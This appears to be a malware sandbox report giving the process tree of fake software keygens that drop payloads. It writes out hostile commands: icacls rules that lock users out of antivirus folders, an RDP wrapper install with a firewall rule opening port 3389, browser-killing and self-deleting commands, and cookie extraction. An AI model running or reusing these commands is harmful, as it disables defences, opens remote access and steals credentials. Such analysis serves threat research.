C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny %username%:(OI)(CI)(F)3⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\KVRT_Data /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)3⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\KVRT_Data /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny %username%:(OI)(CI)(F)3⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\360" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny %username%:(OI)(CI)(F)3⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny %username%:(OI)(CI)(F)3⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny %username%:(OI)(CI)(F)3⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny %username%:(OI)(CI)(F)3⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\COMODO" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny %username%:(OI)(CI)(F)3⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Enigma Software Group" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny %username%:(OI)(CI)(F)3⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny %username%:(OI)(CI)(F)3⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\AVAST Software" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny %username%:(OI)(CI)(F)3⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\AVAST Software" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny %username%:(OI)(CI)(F)3⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\AVAST Software" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny %username%:(OI)(CI)(F)3⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\AVG" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny %username%:(OI)(CI)(F)3⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\AVG" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny %username%:(OI)(CI)(F)3⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Norton" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny %username%:(OI)(CI)(F)3⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Kaspersky Lab" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)3⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny %username%:(OI)(CI)(F)3⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)3⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny %username%:(OI)(CI)(F)3⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Kaspersky Lab" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)3⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny %username%:(OI)(CI)(F)3⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Kaspersky Lab" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)3⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny %username%:(OI)(CI)(F)3⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Doctor Web" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny %username%:(OI)(CI)(F)3⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\grizzly" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny %username%:(OI)(CI)(F)3⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Cezurity" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny %username%:(OI)(CI)(F)3⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Cezurity" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny %username%:(OI)(CI)(F)3⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\McAfee" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny %username%:(OI)(CI)(F)3⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Common Files\McAfee" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny %username%:(OI)(CI)(F)3⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Avira" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny %username%:(OI)(CI)(F)3⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny %username%:(OI)(CI)(F)3⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\ESET" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)3⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny %username%:(OI)(CI)(F)3⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\ESET" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)3⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny %username%:(OI)(CI)(F)3⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Panda Security" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Programdata\Install\utorrent.exeC:\Programdata\Install\utorrent.exe3⤵
- NTFS ADS
-
C:\ProgramData\WindowsTask\azur.exeC:\ProgramData\WindowsTask\azur.exe4⤵
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "azur.exe"5⤵
-
C:\Windows\SysWOW64\timeout.exeC:\Windows\system32\timeout.exe 36⤵
- Delays execution with timeout.exe
-
-
-
-
C:\ProgramData\WindowsTask\system.exeC:\ProgramData\WindowsTask\system.exe4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\Desktop\selfDel.bat" "5⤵
-
-
-
C:\ProgramData\RDPWinst.exeC:\ProgramData\RDPWinst.exe -i4⤵
- Modifies WinLogon
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow5⤵
-
-
-
-
C:\ProgramData\RealtekHD\taskhost.exeC:\ProgramData\RealtekHD\taskhost.exe3⤵
-
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe3⤵
-
-
-
C:\Users\Admin\Desktop\Treasure.Vault.3D.Screensaver.keygen.by.Paradox.exe"C:\Users\Admin\Desktop\Treasure.Vault.3D.Screensaver.keygen.by.Paradox.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX3\keygen.bat" "3⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\intro.exeintro.exe 1O5ZF4⤵
- Executes dropped EXE
- Modifies system certificate store
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\keygen-pr.exekeygen-pr.exe -p83fsase3Ge4⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\RarSFX5\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX5\key.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\RarSFX5\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX5\key.exe -txt -scanlocal -file:potato.dat6⤵
- Executes dropped EXE
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\keygen-step-1.exekeygen-step-1.exe4⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\keygen-step-3.exekeygen-step-3.exe4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX3\keygen-step-3.exe"5⤵
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30006⤵
- Runs ping.exe
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\keygen-step-4.exekeygen-step-4.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Users\Admin\AppData\Local\Temp\RarSFX4\002.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX4\002.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX4\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX4\Setup.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\sibA11.tmp\0\setup.exe"C:\Users\Admin\AppData\Local\Temp\sibA11.tmp\0\setup.exe" -s6⤵
- Executes dropped EXE
-
C:\Program Files (x86)\fjkw1lb5cxpb\aliens.exe"C:\Program Files (x86)\fjkw1lb5cxpb\aliens.exe"7⤵
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies system certificate store
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"8⤵
- Enumerates connected drives
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
-
-
C:\Users\Admin\AppData\Local\Temp\0B44010BDDEFEFD3.exeC:\Users\Admin\AppData\Local\Temp\0B44010BDDEFEFD3.exe 0011 installp18⤵
- Writes to the Master Boot Record (MBR)
-
C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exeC:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe ThunderFW "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"9⤵
-
-
C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe" -StartTP9⤵
- Writes to the Master Boot Record (MBR)
-
-
C:\Users\Admin\AppData\Local\Temp\1021C014A4C9A552.exeC:\Users\Admin\AppData\Local\Temp\1021C014A4C9A552.exe /silent9⤵
-
C:\Users\Admin\AppData\Local\Temp\is-B0QUR.tmp\1021C014A4C9A552.tmp"C:\Users\Admin\AppData\Local\Temp\is-B0QUR.tmp\1021C014A4C9A552.tmp" /SL5="$60176,761193,121344,C:\Users\Admin\AppData\Local\Temp\1021C014A4C9A552.exe" /silent10⤵
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\0B44010BDDEFEFD3.exe"9⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 310⤵
- Runs ping.exe
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\0B44010BDDEFEFD3.exeC:\Users\Admin\AppData\Local\Temp\0B44010BDDEFEFD3.exe 200 installp18⤵
- Writes to the Master Boot Record (MBR)
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe9⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe10⤵
- Kills process with taskkill
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\0B44010BDDEFEFD3.exe"9⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 310⤵
- Runs ping.exe
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Program Files (x86)\fjkw1lb5cxpb\aliens.exe"8⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 39⤵
- Runs ping.exe
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX4\jg2_2qua.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX4\jg2_2qua.exe"5⤵
- Modifies system certificate store
-
-
-
-
-
C:\Users\Admin\Desktop\Remouse.Micro.Micro.v3.5.3.serial.maker.by.aaocg.exe"C:\Users\Admin\Desktop\Remouse.Micro.Micro.v3.5.3.serial.maker.by.aaocg.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "3⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\intro.exeintro.exe 1O5ZF4⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exekeygen-pr.exe -p83fsase3Ge4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat6⤵
- Executes dropped EXE
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exekeygen-step-1.exe4⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exekeygen-step-4.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\002.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\002.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\sib1019.tmp\0\setup.exe"C:\Users\Admin\AppData\Local\Temp\sib1019.tmp\0\setup.exe" -s6⤵
- Executes dropped EXE
-
C:\Program Files (x86)\dz7d9shn0mvi\aliens.exe"C:\Program Files (x86)\dz7d9shn0mvi\aliens.exe"7⤵
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Program Files (x86)\dz7d9shn0mvi\aliens.exe"8⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 39⤵
- Runs ping.exe
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\jg2_2qua.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\jg2_2qua.exe"5⤵
-
-
-
-
-
C:\Users\Admin\Desktop\Magic_File_v3_keygen_by_KeygenNinja.exe"C:\Users\Admin\Desktop\Magic_File_v3_keygen_by_KeygenNinja.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX6\keygen.bat" "3⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\RarSFX6\keygen-pr.exekeygen-pr.exe -p83fsase3Ge4⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\RarSFX7\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX7\key.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\RarSFX7\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX7\key.exe -txt -scanlocal -file:potato.dat6⤵
- Executes dropped EXE
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX6\keygen-step-3.exekeygen-step-3.exe4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX6\keygen-step-3.exe"5⤵
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30006⤵
- Runs ping.exe
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX6\keygen-step-4.exekeygen-step-4.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\RarSFX8\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX8\Setup.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe 001 install56⤵
- Blocklisted process makes network request
- Writes to the Master Boot Record (MBR)
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe 002 install56⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe8⤵
- Kills process with taskkill
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im firefox.exe7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im firefox.exe8⤵
- Kills process with taskkill
-
-
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe 003 install56⤵
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe"7⤵
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\RarSFX8\Setup.exe"6⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 37⤵
- Runs ping.exe
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX8\BTRSetp.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX8\BTRSetp.exe"5⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\RarSFX8\BTRSetp.exe"{path}"6⤵
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX8\BTRSetp.exe"{path}"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3968 -s 9047⤵
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX8\juppp.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX8\juppp.exe"5⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\jfiag_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fjgha23_fa.txt6⤵
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fjgha23_fa.txt6⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX8\id6.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX8\id6.exe"5⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\RarSFX8\lcx.exelcx.exe version2.txt6⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX8\setup_full.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX8\setup_full.exe"5⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX8\setup_full.exe"6⤵
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30007⤵
- Runs ping.exe
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX8\DreamTrips.bat" "5⤵
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.org/1Hgx676⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4716 CREDAT:275457 /prefetch:27⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX8\wyfdggaa.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX8\wyfdggaa.exe"5⤵
- Checks whether UAC is enabled
- Suspicious use of SetWindowsHookEx
-
-
-
-
-
C:\Users\Admin\Desktop\LtHv0O2KZDK4M637.exe"C:\Users\Admin\Desktop\LtHv0O2KZDK4M637.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Users\Admin\Desktop\api.exe"C:\Users\Admin\Desktop\api.exe"2⤵
- Executes dropped EXE
- Enumerates connected drives
- Writes to the Master Boot Record (MBR)
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" "https://adlice.com/thanks-downloading-diag/?utm_campaign=diag&utm_source=soft&utm_medium=btn"3⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1208 CREDAT:275457 /prefetch:24⤵
- Drops desktop.ini file(s)
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1208 CREDAT:930819 /prefetch:24⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1208 CREDAT:668676 /prefetch:24⤵
- Suspicious use of SetWindowsHookEx
-
-
-
-
C:\Users\Admin\Desktop\31.exe"C:\Users\Admin\Desktop\31.exe"2⤵
- Executes dropped EXE
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\3F.tmp\40.tmp\41.bat C:\Users\Admin\Desktop\31.exe"3⤵
-
C:\Program Files\Java\jre7\bin\javaw.exe"C:\Program Files\Java\jre7\bin\javaw.exe" -jar "C:\Users\Admin\AppData\Roaming\1.jar"4⤵
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe5⤵
- Executes dropped EXE
